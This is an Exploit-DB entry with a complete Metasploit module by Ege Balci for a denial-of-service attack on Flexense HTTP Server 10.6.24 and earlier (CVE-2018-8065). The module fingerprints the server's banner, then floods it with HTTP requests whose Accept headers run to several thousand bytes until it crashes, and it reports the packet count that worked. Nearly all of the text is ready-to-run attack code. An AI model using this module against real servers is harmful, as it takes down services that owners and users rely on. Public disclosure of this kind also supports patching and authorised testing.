Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit)

EDB-ID:

51493


Author:

Ege Balci

Type:

remote


Platform:

Multiple

Date:

2023-05-31


##
# Exploit Title: Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit)
# Date: 2018-03-09
# Exploit Author: Ege Balci
# Vendor Homepage: https://www.flexense.com/downloads.html
# Version: <= 10.6.24
# CVE : CVE-2018-8065

# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Dos
  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Flexense HTTP Server Denial Of Service',
      'Description'    => %q{
        This module triggers a Denial of Service vulnerability in the Flexense HTTP server.
        Vulnerability caused by a user mode write access memory violation and can be triggered with
        rapidly sending variety of HTTP requests with long HTTP header values.

        Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below vesions reportedly vulnerable.
      },
      'Author' 		=> [ 'Ege Balci <ege.balci@invictuseurope.com>' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2018-8065'],
          [ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ],
        ],
      'DisclosureDate' => '2018-03-09'))

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('PacketCount',     [ true, "The number of packets to be sent (Recommended: Above 1725)" , 1725 ]),
        OptString.new('PacketSize',      [ true, "The number of bytes in the Accept header (Recommended: 4088-5090"  , rand(4088..5090) ])
      ])

  end

  def check
    begin
      connect
      sock.put("GET / HTTP/1.0\r\n\r\n")
      res = sock.get
      if res and res.include? 'Flexense HTTP Server v10.6.24'
        Exploit::CheckCode::Appears
      else
        Exploit::CheckCode::Safe
      end
    rescue Rex::ConnectionRefused
      print_error("Target refused the connection")
      Exploit::CheckCode::Unknown
    rescue
      print_error("Target did not respond to HTTP request")
      Exploit::CheckCode::Unknown
    end
  end

  def run
    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end

    size = datastore['PacketSize'].to_i
    print_status("Starting with packets of #{size}-byte strings")

    count = 0
    loop do
      payload = ""
      payload << "GET /" + Rex::Text.rand_text_alpha(rand(30)) + " HTTP/1.1\r\n"
      payload << "Host: 127.0.0.1\r\n"
      payload << "Accept: "+('A' * size)+"\r\n"
      payload << "\r\n\r\n"
      begin
        connect
        sock.put(payload)
        disconnect
        count += 1
        break if count==datastore['PacketCount']
      rescue ::Rex::InvalidDestination
        print_error('Invalid destination!  Continuing...')
      rescue ::Rex::ConnectionTimeout
        print_error('Connection timeout!  Continuing...')
      rescue ::Errno::ECONNRESET
        print_error('Connection reset!  Continuing...')
      rescue ::Rex::ConnectionRefused
        print_good("DoS successful after #{count} packets with #{size}-byte headers")
        return true
      end
    end
    print_error("DoS failed after #{count} packets of #{size}-byte strings")
  end
end